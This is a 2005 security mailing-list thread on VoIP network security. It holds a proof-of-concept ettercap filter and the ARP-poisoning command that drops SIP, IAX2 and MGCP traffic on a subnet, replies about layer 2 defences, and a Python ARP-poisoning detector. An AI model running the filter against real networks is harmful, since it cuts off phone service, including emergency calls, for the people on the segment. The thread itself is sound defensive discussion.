[VOIPSEC] VoIP Blocking Filter w/Ettercap

stuart jacobs stu.jacobs at verizon.com
Wed Jul 13 13:19:06 CDT 2005


I need to chime in regarding Jim's last statement about the "carrier  
environment where there are strong physical access controls".  The  
reality is that carrier facilities cannot be assumed to have strong  
physical access controls.  As a result of "Cageless Co-Location"  
regulations many carrier facilities are required to allow non-carrier  
personnel access.  Furthermore one cannot ignore the potential for  
insider malicious activities either.

Stu Jacobs

On Jul 13, 2005, at 10:31 AM, Credland, Jim wrote:

> Protecting a network to which people have physical access is tricky.
> Ettercap is a scary reminder of how easy it is to intercept/reroute and
> generally ethernet segments.  If you've got a test network to try a man in
> the middle attack on using ettercap it's well worth it for the amusement
> value alone.
>
> In an enterprise environment requiring a high standard of VoIP security I'd
> definitely be considering something like 802.1x port authentication to
> reduce the risk from someone connecting a PC to the VoIP vLAN, and if it was
> readily available, encryption of the voice and switching traffic.
>
> Much of the documentation on VoIP Security seems to skip over these kinds of
> problems; the NIST document's solution is use encryption, authentication and
> public keys.  This does little about denial-of-service and has the lack of
> support for these kinds of features in many implementations.  The Cisco
> VoIP security document used to suggest you don't let anyone bad near your
> switch - but I've noticed a new document on their site listing a whole load
> of layer 2 security features - see
> http://www.cisco.com/en/US/netsol/ns340/ns394/ns165/networking_solutions_white_paper0900aecd80240249.shtml
> - in the layer 2 defenses section.  I'd be interested - if your test switch
> has these features - in whether or not you can cause much disruption with
> these features enabled.
>
> I think I saw a tool for listening to intercepted RTP streams but I forget
> what it's called?
>
> Luckily once you get out of your LAN environment to a central server or
> carrier environment where there are strong physical access controls then
> this kind of security becomes less critical and other problems raise their
> heads instead.
>
> jim.credland at thus.net
> Security Consultant
>
>
>> -----Original Message-----
>> From: Natas [mailto:natas05 at gmail.com]
>> Sent: 13 July 2005 02:09
>> To: Voipsec at voipsa.org
>> Subject: [VOIPSEC] VoIP Blocking Filter w/Ettercap
>>
>> After playing around with ettercap and its filter program,
>> etterfilter, I realized how easy it would be to ARP poison a
>> network and block all VoIP packets from passing through.
>> While packet manipulation obviously isn't new, and the root
>> of the problem comes from the ease of ARP poisoning, I was
>> still kind of shocked at how easy an attack like this could
>> be pulled off in a real world scenario.
>> A simple ettercap filter can be used to block all SIP, IAX2
>> and MGCP traffic, stopping any possible communication across
>> a network segment, but letting other traffic properly pass
>> through. Below is a basic filter I wrote up for this list.
>>
>>
>> # blockvoip.filter
>> # Proof of concept VoIP blocking filter
>> # By Natas
>> # Instructions:
>> # Run "etterfilter blockvoip.filter -o blockvoip.ef"
>> # Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"
>>
>> if (ip.proto == UDP && udp.src == 4569) {
>>     msg("Killed Attempted IAX2 Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 5060) {
>>     msg("Killed Attempted SIP Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 2427) {
>>     msg("Killed Attempted MGCP Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> # Don't know too much about MGCP Call Agent traffic but
>> # I put it in here for the hell of it.
>> if (ip.proto == UDP && udp.src == 2727) {
>>     msg("Killed Attempted MGCP Call Agent Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> # End.
>>
>> Obviously this is just a simple example and could easily be
>> expanded to ensure that no VoIP traffic whatsoever passes through.
>>
>> I'm not sure how everyone here will feel about this little
>> example but I wanted to put it out there for everyone to see.
>> I have some other VoIP packet manipulation ideas that I am
>> playing around with.
>>
>> I enjoy the VoIPSA mailing list very much and like reading
>> everyone's posts and concerns. If you would like to talk off
>> the list, feel free to email me or contact me at 206-338-3337.
>>
>> Natas
>>
>> _______________________________________________
>> Voipsec mailing list
>> Voipsec at voipsa.org
>> http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>>
>
Stuart Jacobs, CISM, CISSP
PMTS - Sr. Technologist
Network Security
Verizon Laboratories
40 Sylvan Road
Waltham MA 02451-1128
(781) 466-3076
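Added example, not code from any of the posters: the attack Natas describes rests on ARP poisoning, and the simplest network-side tell of it is one IP address being claimed by more than one MAC in ARP replies. The script below parses raw Ethernet/ARP frames and reports such conflicts; the MAC addresses, IPs and frames are constructed sample data, not a real capture.

```python
"""ARP-poisoning detector: flags an IP claimed by more than one MAC (constructed sample input)."""
import struct
from collections import defaultdict

ETH_ARP, ARP_REPLY = 0x0806, 2

def parse_arp(frame: bytes):
    """Return (sender_ip, sender_mac, opcode) for an Ethernet II + IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != struct.pack("!H", ETH_ARP):
        return None
    # ARP header after the 14-byte Ethernet header: htype, ptype, hlen, plen, oper, sha, spa, ...
    _htype, _ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if hlen != 6 or plen != 4:
        return None
    sender_mac = frame[22:28].hex(":")
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return sender_ip, sender_mac, oper

def detect_poisoning(frames):
    """Learn IP->MAC bindings from ARP replies; report any IP later claimed by a different MAC."""
    bindings = defaultdict(set)
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[2] != ARP_REPLY:
            continue
        ip, mac, _ = parsed
        if bindings[ip] and mac not in bindings[ip]:
            alerts.append(f"{ip} claimed by {mac}, previously {sorted(bindings[ip])}")
        bindings[ip].add(mac)
    return alerts

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build a constructed Ethernet/ARP reply frame (14 + 28 bytes) as sample input."""
    eth = target_mac + sender_mac + struct.pack("!H", ETH_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += sender_mac + bytes(int(o) for o in sender_ip.split("."))
    arp += target_mac + bytes(int(o) for o in target_ip.split("."))
    return eth + arp

# Constructed sample (not a real capture): the gateway 10.1.1.1 answers first,
# then a third MAC claims the same IP, which is what a poisoned ARP cache looks like on the wire.
GATEWAY_MAC, PHONE_MAC, ROGUE_MAC = (bytes.fromhex(h) for h in ("aabbccddee01", "aabbccddee02", "aabbccddee99"))
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, "10.1.1.1", PHONE_MAC, "10.1.1.50"),
    build_arp_reply(PHONE_MAC, "10.1.1.50", GATEWAY_MAC, "10.1.1.1"),
    build_arp_reply(ROGUE_MAC, "10.1.1.1", PHONE_MAC, "10.1.1.50"),
]
```

On a real segment the same logic would be fed from a promiscuous capture and backed by a static or DHCP-snooping-derived binding table, which is what the switch-side layer 2 defenses Jim mentions do in hardware.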


